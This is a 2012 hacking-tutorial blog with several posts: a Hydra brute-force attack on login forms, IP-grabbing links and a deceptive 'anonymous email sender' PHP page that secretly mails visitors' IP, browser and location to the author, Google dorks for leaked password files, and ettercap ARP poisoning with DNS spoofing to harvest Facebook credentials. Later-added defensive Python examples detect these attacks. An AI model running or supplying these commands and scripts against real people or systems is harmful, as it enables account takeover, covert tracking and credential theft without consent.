Monday, August 27, 2012

Hydra THC web form dictionary attack

Hello,

In this tutorial I will show you how to use THC Hydra to perform a dictionary attack against a web form, for example a username/password login form.

THC Hydra is a powerful program that ships with the BackTrack OS. With Hydra you can perform a dictionary attack against HTTP forms, SMB, routers and more.

#Step 1) So to start the attack you have to find a good wordlist. A wordlist is a txt/lst file containing many candidate words. (A good wordlist contains numbers, special characters and letters.) You can download a wordlist from the web or you can make your own wordlist (recommended). So download crunch (a wordlist generator), install it, go to the installation folder (crunch-3.3) and run the following command:

cd crunch-3.3/

and then run:

./crunch 1 5 0123456789 > /root/Desktop/wordlist.txt

Your screen should look like this now (screenshot not reproduced).

#Step 2) Once the wordlist is ready you have to run THC Hydra and execute the attack.
Open hydra (Backtrack > Privilege Escalation > Password Attack > Online Attacks > hydra )


#Step 3) Now go to the login page of the target site > right click > View page source, to view the source code of the form.
You will see something like this (but of course different, not exactly the following):

<form name="input" action="kwd.php" method="post">
Username:
<input type="text" name="user">

Password:
<input type="password" name="pass">
</form>

 
Just write down the action page, the method, the username field name and the password field name in a txt file so you remember them.
Now, before we finish, we have to make an attempt with a random username and password to obtain the error message. (Don't forget to write the error message in the txt file.) Like this:
(In this case the error message for a wrong login is ACCESS DENIED.)


Now it's time to perform the attack. Once we know the username field name, the password field name, the action page and the method we are ready!

Now go to the hydra window (have a look at Step 2 again) and type the following command:

hydra www.site.com  http-form-post "/directory:user=^USER^&pass=^PASS^:ERROR MESSAGE" -L /root/Desktop/wordlist.txt -P /root/Desktop/wordlist.txt -t 10 -w 30 -o /root/Desktop/attack.txt




You have to replace "www.site.com" with the target's site, the /directory with the path of the login page, e.g. index/Login.php, "user" with the username field name of the site (Step 3), "pass" with the password field name of the site (Step 3) and ERROR MESSAGE with the error message that the target gives you, in this case "ACCESS DENIED" (another site might say "Wrong username or Password").
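Seen from the server's side, this attack is easy to spot. The following is an added example, not code from the original post: it reads web server access log lines, counts POSTs to the form's action page per client in a sliding window, and flags clients that exceed a threshold. It assumes the form posts to /kwd.php as in the Step 3 snippet and that a failed login still returns HTTP 200 with the error text in the body (which is why Hydra matches on "ACCESS DENIED" rather than on a status code); the log lines and client addresses are constructed. It also computes how many candidates the crunch command above produces, to show why a per-client throttle or lockout matters.

```python
"""Spot a web-form dictionary attack in the server's access log (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" format, e.g.
# 203.0.113.5 - - [27/Aug/2012:10:00:00 +0000] "POST /kwd.php HTTP/1.1" 200 512
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def keyspace_size(min_len, max_len, charset):
    """Number of candidates 'crunch MIN MAX CHARSET' emits (sum of n^k)."""
    n = len(charset)
    return sum(n ** k for k in range(min_len, max_len + 1))


def parse_line(line):
    """Return a dict for one combined-format log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_bruteforce(lines, login_path="/kwd.php", window_s=60, threshold=20):
    """Return {ip: total_posts} for clients that sent more than `threshold`
    POSTs to `login_path` within any `window_s`-second sliding window.
    The status code is ignored on purpose: on this form a failed login
    is still a 200 response, so the POST rate is the signal."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            posts[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # shrink the window from the left until it spans at most window_s
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = len(times)
                break
    return flagged


def sample_log():
    """Constructed sample: one client hammering kwd.php, one normal login."""
    lines = [
        f'203.0.113.5 - - [27/Aug/2012:10:00:{sec:02d} +0000] '
        f'"POST /kwd.php HTTP/1.1" 200 512'
        for sec in range(25)
    ]
    lines.append('198.51.100.7 - - [27/Aug/2012:10:00:05 +0000] '
                 '"GET /login.html HTTP/1.1" 200 1024')
    lines.append('198.51.100.7 - - [27/Aug/2012:10:00:09 +0000] '
                 '"POST /kwd.php HTTP/1.1" 302 0')
    return lines


if __name__ == "__main__":
    print("crunch 1 5 0123456789 yields", keyspace_size(1, 5, "0123456789"), "candidates")
    for ip, n in find_bruteforce(sample_log()).items():
        print(f"possible dictionary attack from {ip}: {n} POSTs to the login form")
```

With the threshold at 20 POSTs per minute the constructed attacker is reported after its 21st request while the normal user is not; a real deployment would feed the flagged addresses to a rate limiter or fail2ban-style block rather than only printing them.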

Thank you!

Nikos Danopoulos

Wednesday, August 8, 2012

Finding IPs via Gmail and with your own PHP code!

Hello there:)

Today I will show you a tutorial about how to find an IP with Gmail and with your own PHP code. First of all, PHP is a scripting language and you can find more about it here. There are many tutorials on the web too.

So, let's start. First of all you have to log in to your Gmail account. If you don't have one just create one! (Very simple.)
The second step is to find the hobbies of the target so you can send a realistic message. We only have to google his/her name or read the 'About' section on Facebook.
Now you have to send an email to the target and just wait for his/her reply!

Your screen should look like this (screenshot not reproduced).

Now open the 'Down' button as you can see in the following picture,

and just press 'Show original'. Now you will see the following...

You can easily see the IP after 'Received: by....'
So you have found your target's IP! Congrats.
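The 'Show original' view is just the raw message, and reading its Received: chain is the same step an analyst takes when triaging a suspicious e-mail. The following is an added example, not code from the original post: it parses the Received headers of a raw message, lists the hops newest-first (each relay prepends its own header), extracts the IPv4 literals, and separates the address claimed in the oldest hop (the "sender IP" of the post, written by a server the sender may control) from the last address handed to one of your own servers, which is the only hop you can vouch for. The message, host names and addresses are constructed.

```python
"""Walk the Received: chain of a raw e-mail (added example)."""
import email
import re
from ipaddress import ip_address

# Constructed message: two relays, the older one is the sender's own connection.
RAW_MESSAGE = """\
Received: from mail-relay.example.net (mail-relay.example.net [198.51.100.25])
        by mx.receiver.example (Postfix) with ESMTPS id 4F3A2
        for <analyst@receiver.example>; Wed, 8 Aug 2012 12:00:05 +0000
Received: from [192.0.2.77] (cpe-192-0-2-77.isp.example [192.0.2.77])
        by mail-relay.example.net with ESMTPSA id abc123
        for <analyst@receiver.example>; Wed, 8 Aug 2012 12:00:01 +0000
From: someone@example.net
To: analyst@receiver.example
Subject: hello
Message-ID: <constructed-1@example.net>

body text
"""

IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
FROM_BY_RE = re.compile(r"\bfrom (\S+).*?\bby (\S+)")


def _ips_in(text):
    """IPv4 literals in a header value, validated and de-duplicated in order."""
    found = []
    for cand in IPV4_RE.findall(text):
        try:
            ip_address(cand)
        except ValueError:
            continue
        if cand not in found:
            found.append(cand)
    return found


def received_hops(raw):
    """Return the Received headers as dicts, newest hop first."""
    msg = email.message_from_string(raw)
    hops = []
    for value in msg.get_all("Received", []):
        text = " ".join(value.split())          # unfold continuation lines
        m = FROM_BY_RE.search(text)
        hops.append({
            "from": m.group(1) if m else None,  # what the connecting host called itself
            "by": m.group(2) if m else None,    # the server that wrote this header
            "ips": _ips_in(text),
            "raw": text,
        })
    return hops


def claimed_origin(hops):
    """Address in the oldest hop: the post's 'sender IP'. Not verified."""
    if hops and hops[-1]["ips"]:
        return hops[-1]["ips"][0]
    return None


def last_verifiable_ip(hops, own_hosts):
    """Walk from the newest hop while the header was written by one of our own
    servers; the address in the last such hop is the peer that actually
    connected to us. Anything older could have been forged by the sender."""
    verified = None
    for hop in hops:
        if hop["by"] not in own_hosts or not hop["ips"]:
            break
        verified = hop["ips"][0]
    return verified


if __name__ == "__main__":
    hops = received_hops(RAW_MESSAGE)
    for i, hop in enumerate(hops):
        print(f"hop {i}: from={hop['from']} by={hop['by']} ips={hop['ips']}")
    print("claimed origin:", claimed_origin(hops))
    print("last verifiable peer:", last_verifiable_ip(hops, {"mx.receiver.example"}))
```

In the constructed message the oldest hop says 192.0.2.77, but the only hop written by our own MX records 198.51.100.25 as the connecting peer; a sender who controls the relay can write anything into the older header.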

One more popular way to find an IP is to make a script (8 lines), upload it to your webhost and then send the link to the target. Here is how you can do it.

First of all access your webhost account (I use 000webhost, it is very good and free). Then make a file with the name news.php. Edit it and write the following code into the file:

<?php
$ip=$_SERVER['REMOTE_ADDR'];      // address the request came from, as seen by the web server
$to='youremail';                  // replace with the address that should receive the report
$headers='From: me@gmail.com';    // mail()'s 4th argument is a string of extra headers, so "From: ..." is needed here
$subject='Ip';
$message=$ip;
mail($to,$subject,$message,$headers);
?>
Code explanation:
Line 1: Opening PHP tag
Line 2: We tell the program that the variable $ip is the IP of the visitor (target)
Line 3: The $to variable is your email
Line 4: The $headers variable sets the From header, i.e. the sender address shown (me@gmail.com)
Line 5: $subject is the email's subject (Ip)
Line 6: $message is the email's message. In this case the message is the IP.
Line 7: Sending the email...
Line 8: Closing PHP tag

Then send the link to your target (www.domain.com/news.php). When he clicks it you will receive a message in your email account with his IP!
Your message!! (screenshot not reproduced)

*If you are using a Hotmail account, you will receive the message in the Junk folder.


So, you have learned 2 ways of finding IPs. Enjoy :)

Thank you,

Nikos Danopoulos

Monday, July 30, 2012

How can Google dorks help us perform web attacks

Welcome,
There are many times when a hacker is at home and ... trying to find something interesting to do.
Here is a simple tutorial about how we can exploit Google with some useful Google dorks. If you don't know what Google dorks are, just read the following lines.

With Google dorks you can find many vulnerabilities by searching on Google. You type some specific search operators into the Google search bar and then you can find many sites affected by many different vulns.

So have a look:

The following query searches 'Index of' directory listings for a 'phpinfo.php' file:

intitle:"Index of" phpinfo.php  

You will see something like this on your screen (check the screenshot): we have found a file 'phpinfo.php' in the Index Of listing of a site...

You can also check the Apache version... It's information!

So it's time to try finding SQLi vulnerabilities (SQLi on Wikipedia).

There are some simple queries you can 'run' for finding SQLi vulnerabilities.

ext:sql intext:@gmail.com intext:25d55ad283aa400af464c76d713c07ad

With this query we are searching for files with the .sql extension (database dumps), for @gmail.com in the page, and finally for 25d55ad283aa400af464c76d713c07ad, which is the MD5 hash of 12345678.

You can also search for 'ext:sql intext:"INSERT INTO" intext:@gmail.com intext:password'

which searches for INSERT INTO in a web page, for a Gmail account and for the word password. You can replace gmail with hotmail/live/windowslive/yahoo and more.



So the most common dorks are 'inurl', which searches for a keyword in the URL; 'intext', which searches for text/keywords in the whole web page; 'intitle', which searches for a keyword in the page title; and 'filetype', which searches for a specific file type like .pdf, .exe and more. You can use them for many purposes. They are very useful too.


So the final example is about 'password file dorks'.

Here are some dorks:
allinurl: auth_user_file.txt  <=== this dork searches for auth_user_file.txt
filetype: xls inurl: "password.xls"  <=== this dork searches for a file 'password.xls'
intitle:index.of pwd.db  <=== searches for password databases
index.of passlist.txt  <=== searches for password lists

There are many more. Just combine keywords and use them.
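Everything these dorks find is something the site owner could have found first by crawling their own document root. The following is an added example, not code from the original post: it walks a web root and reports the same exposures the dorks above target, namely files with the quoted names (phpinfo.php, auth_user_file.txt, password.xls, pwd.db, passlist.txt), .sql dumps that pair e-mail addresses with 32-hex tokens (unsalted MD5 hashes, such as the hash of 12345678 quoted above), and directories with no index file, which Apache with directory indexing enabled serves as an 'Index of' listing. The file tree is constructed in a temporary directory so the script runs offline; the tiny guess list is an assumption for the demo.

```python
"""Audit a web root for what the Google dorks above would find (added example)."""
import hashlib
import os
import re
import tempfile

# file names taken from the dorks in the post
SENSITIVE_NAMES = {"phpinfo.php", "auth_user_file.txt", "password.xls",
                   "pwd.db", "passlist.txt"}
INDEX_FILES = {"index.html", "index.htm", "index.php"}
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b")
# tiny guess list (assumption for the demo); a real audit would use a proper wordlist
COMMON_PASSWORDS = ("12345678", "password", "123456")


def weak_hashes(hashes):
    """Map each hash that is the plain MD5 of a common password to that password."""
    table = {hashlib.md5(p.encode()).hexdigest(): p for p in COMMON_PASSWORDS}
    return {h: table[h] for h in hashes if h in table}


def scan_dump(path, rel):
    """Classify a .sql file: a credential dump if it holds e-mails next to MD5-like tokens."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    emails = set(EMAIL_RE.findall(text))
    hashes = set(MD5_RE.findall(text))
    if emails and hashes:
        return {"type": "credential-dump", "path": rel, "emails": len(emails),
                "hashes": len(hashes), "weak": weak_hashes(hashes)}
    return {"type": "sql-dump", "path": rel}


def audit_webroot(root):
    """Return a list of finding dicts for everything under `root`."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        if not INDEX_FILES & set(files):
            # no index file: with 'Options Indexes' this directory is an 'Index of' page
            findings.append({"type": "autoindex", "path": rel_dir})
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name in SENSITIVE_NAMES:
                findings.append({"type": "sensitive-file", "path": rel})
            if name.lower().endswith(".sql"):
                findings.append(scan_dump(path, rel))
    return findings


def build_sample_tree():
    """Constructed web root: a normal top level, an admin dir with phpinfo, a backup dump."""
    root = tempfile.mkdtemp(prefix="webroot-")
    layout = {
        "index.html": "<h1>site</h1>",
        "admin/index.php": "<?php echo 'admin'; ?>",
        "admin/phpinfo.php": "<?php phpinfo(); ?>",
        "backup/users.sql": (
            "INSERT INTO users VALUES "
            "('alice@gmail.com','25d55ad283aa400af464c76d713c07ad');\n"
        ),
    }
    for rel, content in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for finding in audit_webroot(build_sample_tree()):
        print(finding)
```

Run it against the real document root (or a copy) and treat every finding as something a search engine will index as soon as it is linked; the fix is to remove the file, deny directory listings, and rotate any credentials in a dump.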

Thank you
Nikos Danopoulos


Sunday, April 22, 2012

PHP anonymous email sender and information gathering. Oh yes!

Hello, good morning!
Today (Sun Apr 22) you will see a powerful PHP script and HTML code for making 2 pages. The first page is an anonymous email sender, so you can send any email anywhere in the world with any sender name!
The second page is a page which collects all the information about the email sender.

OK, here is a short story!
I give the email sender to a friend and tell him/her: "Hey, this is an anonymous email sender. You can send mails everywhere! And of course with no name or with a fake name! Just open it." Let's say your friend opens the link and sends an email... Then you will receive an email with the victim's IP, location (city, region_name), operating system (e.g. Windows, Linux), web browser (e.g. Firefox, Opera, IE, Iceweasel, Google Chrome), the recipient your friend sent the email to, and more.

OK, let's start now. First of all you have to have a web host (I suggest 000webhost (www.000webhost.com) or ripway (www.ripway.com)). They are both free. Now go to the Desktop and make a new document. Open it and write the following code into the file:

<html>
<head>
<title>Email Anonymous Sender</title>
</head>
<body style="background-color:black">
<form method="post" action="aaa.php">
<p style="font-style:italic;color:white">Victim's Email: <input type="text" name="email"></p>
<p style="font-style:italic;color:white">Subject: <input type="text" name="subject"></p>
<p style="font-style:italic;color:white">Message: <textarea name="message" rows="5" cols="55"></textarea></p>
<p style="font-style:italic;color:white">Your Email: <input type="text" name="myemail"></p>
<input type="submit" value="Submit"/>
<input type="reset" value="Erase All"/>
</form>
</body>
</html>

OK, now click "save" and save it as "email.php" (WARNING: the name of the page is very important! Don't rename the page).

Now let's make the second page.

Make a new document and type the following code into it:
<?php
$ip=$_SERVER['REMOTE_ADDR'];            // visitor's address as seen by the web server
$browser=$_SERVER['HTTP_USER_AGENT'];   // browser and OS string the visitor's browser sends
$br=$_SERVER['REMOTE_USER'];            // HTTP-auth user; only set if the host uses HTTP authentication (unused below)
$to=$_POST["email"];
$subject=$_POST["subject"];
$message=$_POST["message"];
$from=$_POST["myemail"];
$head="From:" . $from;                  // header built straight from the form input, no validation
mail($to,$subject,$message,$head);      // send the visitor's message
$mss="Ip:" . $ip;
$me="example@gmail.com";                // put your own address here
$host="host info";                      // subject of the report mail
$json = json_decode(file_get_contents('http://freegeoip.net/json/'.$ip));
$region_name = !empty($json->region_name) ? $json->region_name : 'Unknown Region';
$city = !empty($json->city) ? $json->city : 'Unknown City';
mail($me,$host,$mss . "," . "Victim's info:" . $browser . "" . "Location:" . $region_name . ":" . $city);
?>

<html>
<body style="background-color:black">
<h1 style="color:green">Let the games begin;) </h1>
<img src="https://encrypted-tbn3.google.com/images?q=tbn:ANd9GcSShwOxeW3aKl4VnV4cVMFE45ndqORlURwyxXl8ejE7x_UGS5O7" alt="That's how you look now.." style="color:white"/>
</body>
</html>

 

As you can see I have colored one of the red lines green. This is because you have to put your email there instead of "example@gmail.com".

OK, now save this document as "aaa.php". So, now we are ready.

Go to your webhost (I use 000webhost) and open the file manager. Then select "public_html" and click the "upload" button. Now you have to upload the files you made before. Just select them and click upload (if you are using 000webhost don't forget to click the "check" icon).






OK, now open a new tab in your web browser and type the following: "mysite.net.76.net/email.php" (Be careful! Instead of mysite.net.76.net type in your own website!)




Now send an email for testing. Just type your own email in Victim's Email and send an email.
Now go to your email and you will see something like this.
There is your information: the IP, the web browser, your location, your operating system and more! Now you are ready to send it to a friend and have some fun!
Thank you,
Nikos Danopoulos

Saturday, April 21, 2012

Tut04: Ettercap (scanning, attacking)

Hey!
With the following tutorial you will learn many things about ettercap, for example how to run an ARP attack, how to scan for hosts and more.
OK, let's start.
First of all you have to download ettercap. Just become root (su) and then install ettercap with the following command: apt-get install ettercap.
Before you start using ettercap you must learn what ettercap is!
Ettercap is a very powerful tool for MITM attacks (man-in-the-middle attacks) (http://en.wikipedia.org/wiki/Man-in-the-middle_attack). With ettercap you can do many tricks, for example sniffing on your network, DNS spoofing and more.

Now you are ready to see how ettercap works!

First of all open your terminal. Type "su" and your password to become root.

Here is a simple command for ettercap.

ettercap -T  -M arp:remote -i wlan0 /192.168.1.1/ // -P remote_browser

OK, let's see what this command does.
First of all, with "ettercap" we call ettercap. The -T option starts ettercap in text mode.
The -M option starts the MITM (man in the middle) attack and arp:remote is the kind of poisoning.
-i is the interface. My interface is eth1 but yours may be wlan0 (as in the example).
The /192.168.1.1/ // part attacks the IPs between 192.168.1.1 and 192.168.1.254.
Finally the -P option loads the plugin you want, in this case "remote_browser", a plugin which lets you see the sites the victim visits.


Another example is with the famous plugin dns_spoof.
With dns_spoof you can redirect the victim to any website.

Step 1) In the terminal type "cd /usr/share/ettercap/" and then "nano etter.dns" to open ettercap's DNS file and edit it.


By scrolling down you will see the following lines:
microsoft.com      A   198.182.196.56
*.microsoft.com    A   198.182.196.56
www.microsoft.com  PTR 198.182.196.56


Let's say that you want to redirect the victim from Google to YouTube. Just ping YouTube by typing ping www.youtube.com in the terminal and then change etter.dns to:
google.*   A   173.194.67.91
www.google.*   A  173.194.67.91
www.google.com  PTR 173.194.67.91


Then press Ctrl+O to save the changes and then Ctrl+X to exit.
Now type in the terminal ettercap -T -M arp:remote -i eth1 /192.168.1.1/ // -P dns_spoof and the victim will be redirected to YouTube.

You can also type:
facebook.*   A   your ip
www.facebook.*   A  your ip
www.facebook.com  PTR your ip


and if the victim connects to Facebook, you will learn his password and username :)
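The arp:remote poisoning above leaves a clear trace on the LAN: the attacking host's MAC starts answering for the gateway 192.168.1.1 and for each victim. The following is an added example, not code from the original post or the ettercap project: a small monitor that consumes ARP replies as (IP, MAC) pairs, for instance from a packet capture or from periodic ARP cache polls, and raises an alert when an IP's MAC changes or when one MAC claims several IPs. It optionally takes a static table of known hosts (e.g. the gateway's real MAC). The replies and MAC addresses are constructed.

```python
"""Detect the ARP poisoning that 'ettercap -M arp:remote' performs (added example)."""
from collections import defaultdict

GATEWAY = "192.168.1.1"

# Constructed ARP replies in arrival order: (sender IP, sender MAC).
SAMPLE_REPLIES = [
    ("192.168.1.1", "00:11:22:33:44:01"),   # router answering for itself
    ("192.168.1.10", "00:11:22:33:44:0a"),  # victim host
    ("192.168.1.20", "00:11:22:33:44:14"),  # host that will run ettercap
    ("192.168.1.1", "00:11:22:33:44:14"),   # poisoned: router IP now at .20's MAC
    ("192.168.1.10", "00:11:22:33:44:14"),  # poisoned: victim IP now at .20's MAC too
]


def monitor_arp(replies, known=None):
    """replies: iterable of (ip, mac) from ARP replies, in arrival order.
    known: optional {ip: mac} of statically known hosts (e.g. the gateway).
    Returns the list of alert dicts in the order they were raised."""
    seen = {ip: mac.lower() for ip, mac in (known or {}).items()}
    ips_by_mac = defaultdict(set)
    for ip, mac in seen.items():
        ips_by_mac[mac].add(ip)

    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        prev = seen.get(ip)
        if prev is not None and prev != mac:
            # the binding for this IP moved to a different interface
            alerts.append({"type": "mac-changed", "ip": ip, "old": prev, "new": mac})
            ips_by_mac[prev].discard(ip)
        seen[ip] = mac
        if ip not in ips_by_mac[mac]:
            ips_by_mac[mac].add(ip)
            if len(ips_by_mac[mac]) > 1:
                # one interface speaking for several IPs: typical of a MITM host
                alerts.append({"type": "mac-claims-multiple-ips", "mac": mac,
                               "ips": sorted(ips_by_mac[mac])})
    return alerts


def gateway_hijacked(alerts, gateway=GATEWAY):
    """True if any alert shows the gateway's MAC binding changing."""
    return any(a["type"] == "mac-changed" and a["ip"] == gateway for a in alerts)


if __name__ == "__main__":
    alerts = monitor_arp(SAMPLE_REPLIES, known={GATEWAY: "00:11:22:33:44:01"})
    for a in alerts:
        print(a)
    print("gateway hijacked:", gateway_hijacked(alerts))
```

On a real network the same two signals can be had without custom code from arpwatch, or prevented outright with static ARP entries for the gateway and dynamic ARP inspection on managed switches.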

Thursday, April 12, 2012

Tutorial03: Nmap in our days

What about playing with Nmap? A powerful tool for scanning your network!
(http://nmap.org/)

Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).
Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in eight movies, including The Matrix Reloaded, Die Hard 4, and The Bourne Ultimatum.
Nmap is ...
  • Flexible: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more. See the documentation page.
  • Powerful: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.
  • Portable: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.
  • Easy: While Nmap offers a rich set of advanced features for power users, you can start out as simply as "nmap -v -A targethost". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.
  • Free: The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.
  • Well Documented: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages here.
  • Supported: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the Nmap mailing lists. Most bug reports and questions should be sent to the nmap-dev list, but only after you read the guidelines. We recommend that all users subscribe to the low-traffic nmap-hackers announcement list. You can also find Nmap on Facebook and Twitter. For real-time chat, join the #nmap channel on Freenode or EFNet.
  • Acclaimed: Nmap has won numerous awards, including "Information Security Product of the Year" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the press page for further details.
  • Popular: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities.
This information is based on the official Nmap site (www.nmap.org).

Let the games begin!
First of all open your terminal, get root privileges and type "apt-get install nmap".
Wait a couple of seconds and then you are ready to dive into Nmap!
There are two basic types of scanning with Nmap: -sT (TCP connect scanning) and -sS (SYN scanning).
You can run these scans by typing in the terminal "nmap -sT [target's IP]" or "nmap -sS [target's IP]".
You can also run a ping scan by typing "nmap -sP [target's IP]". By pinging a target you are actually sending an ICMP echo request packet to the target. If an ICMP reply is received the target is up, and Nmap will print on your terminal that the target is up. If you don't receive an ICMP reply, it means the target is down.
A very useful Nmap option is also -sV, which collects information about the service on a port, including the product name and version number. There is also -sA (checks whether a port is filtered or not) and -O (finds the OS of the target).

If you are "allergic" to the terminal and command line you can use the -iL <file> option. This option allows you to make a file (txt file) and write the IPs of the targets into it. Then by typing nmap -iL filename.txt in the terminal, Nmap will read the input from the file!

Here are some examples of well-known Nmap commands:

1) -sP
[chaos]# nmap -sP 10.0.0.0/24

Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at
        2006-07-14 14:19 BST
Host 10.0.0.1 appears to be up.
MAC Address: 00:09:5B:29:FD:96 (Netgear)
Host 10.0.0.2 appears to be up.
MAC Address: 00:0F:B5:96:38:5D (Netgear)
Host 10.0.0.4 appears to be up.
Host 10.0.0.5 appears to be up.
MAC Address: 00:14:2A:B1:1E:2E (Elitegroup Computer System Co.)
Nmap finished: 256 IP addresses (4 hosts up) scanned in 5.399 seconds

2) -sS with -A (OS fingerprinting)
[chaos]# nmap -sS -A 10.0.0.1

Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at
        2006-07-14 14:23 BST
Insufficient responses for TCP sequencing (0),
        OS detection may be less accurate
Interesting ports on 10.0.0.1:
(The 1671 ports scanned but not shown below are in state:
        closed)
PORT   STATE SERVICE    VERSION
80/tcp open  tcpwrapped
MAC Address: 00:09:5B:29:FD:96 (Netgear)
Device type: WAP
Running: Compaq embedded, Netgear embedded
OS details: WAP: Compaq iPAQ Connection Point or
        Netgear MR814

Nmap finished: 1 IP address (1 host up) scanned in
        3.533 seconds
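The nmap.org text above mentions network inventory and Ndiff as uses of Nmap; both start with getting scan results into a structured form. The following is an added example, not code from the original post or the Nmap project: a parser for the classic text output in the two shapes shown, the -sP sweep ("Host X appears to be up." plus an optional "MAC Address:" line) and the -sS -A scan with its PORT/STATE/SERVICE/VERSION table and "OS details:" line. Nmap wraps long lines with leading whitespace, so continuation lines are joined first. The sample text is the output quoted above, re-typed as constructed input; for anything beyond a demo use nmap -oX and parse the XML, since the text format changes between versions.

```python
"""Turn classic nmap text output into inventory records (added example)."""
import re

# Constructed input: the -sP sweep output quoted in the post.
SWEEP_OUTPUT = """\
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at
        2006-07-14 14:19 BST
Host 10.0.0.1 appears to be up.
MAC Address: 00:09:5B:29:FD:96 (Netgear)
Host 10.0.0.2 appears to be up.
MAC Address: 00:0F:B5:96:38:5D (Netgear)
Host 10.0.0.4 appears to be up.
Host 10.0.0.5 appears to be up.
MAC Address: 00:14:2A:B1:1E:2E (Elitegroup Computer System Co.)
Nmap finished: 256 IP addresses (4 hosts up) scanned in 5.399 seconds
"""

# Constructed input: the -sS -A scan output quoted in the post.
SCAN_OUTPUT = """\
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at
        2006-07-14 14:23 BST
Insufficient responses for TCP sequencing (0),
        OS detection may be less accurate
Interesting ports on 10.0.0.1:
(The 1671 ports scanned but not shown below are in state:
        closed)
PORT   STATE SERVICE    VERSION
80/tcp open  tcpwrapped
MAC Address: 00:09:5B:29:FD:96 (Netgear)
Device type: WAP
Running: Compaq embedded, Netgear embedded
OS details: WAP: Compaq iPAQ Connection Point or
        Netgear MR814

Nmap finished: 1 IP address (1 host up) scanned in
        3.533 seconds
"""

HOST_RE = re.compile(r"^(?:Host (\S+) appears to be up\.|Interesting ports on (\S+):)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-F:]{17})(?: \((.*)\))?")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
OS_RE = re.compile(r"^OS details: (.*)$")


def _unwrap(text):
    """Join nmap's indented continuation lines onto the line before them."""
    out = []
    for line in text.splitlines():
        if line[:1].isspace() and out:
            out[-1] += " " + line.strip()
        else:
            out.append(line.rstrip())
    return out


def parse_nmap_text(text):
    """Return a list of host dicts: ip, mac, vendor, ports, os."""
    hosts, cur = [], None
    for line in _unwrap(text):
        m = HOST_RE.match(line)
        if m:
            cur = {"ip": m.group(1) or m.group(2), "mac": None, "vendor": None,
                   "ports": [], "os": None}
            hosts.append(cur)
            continue
        if cur is None:
            continue                      # banner lines before the first host
        m = MAC_RE.match(line)
        if m:
            cur["mac"], cur["vendor"] = m.group(1), m.group(2)
            continue
        m = PORT_RE.match(line)           # the PORT/STATE header does not match (no digits)
        if m:
            cur["ports"].append({"port": int(m.group(1)), "proto": m.group(2),
                                 "state": m.group(3), "service": m.group(4),
                                 "version": m.group(5).strip()})
            continue
        m = OS_RE.match(line)
        if m:
            cur["os"] = m.group(1)
    return hosts


def open_ports(hosts):
    """{ip: [open port numbers]}, the shape you diff between two scans."""
    return {h["ip"]: [p["port"] for p in h["ports"] if p["state"] == "open"]
            for h in hosts}


if __name__ == "__main__":
    for host in parse_nmap_text(SWEEP_OUTPUT) + parse_nmap_text(SCAN_OUTPUT):
        print(host)
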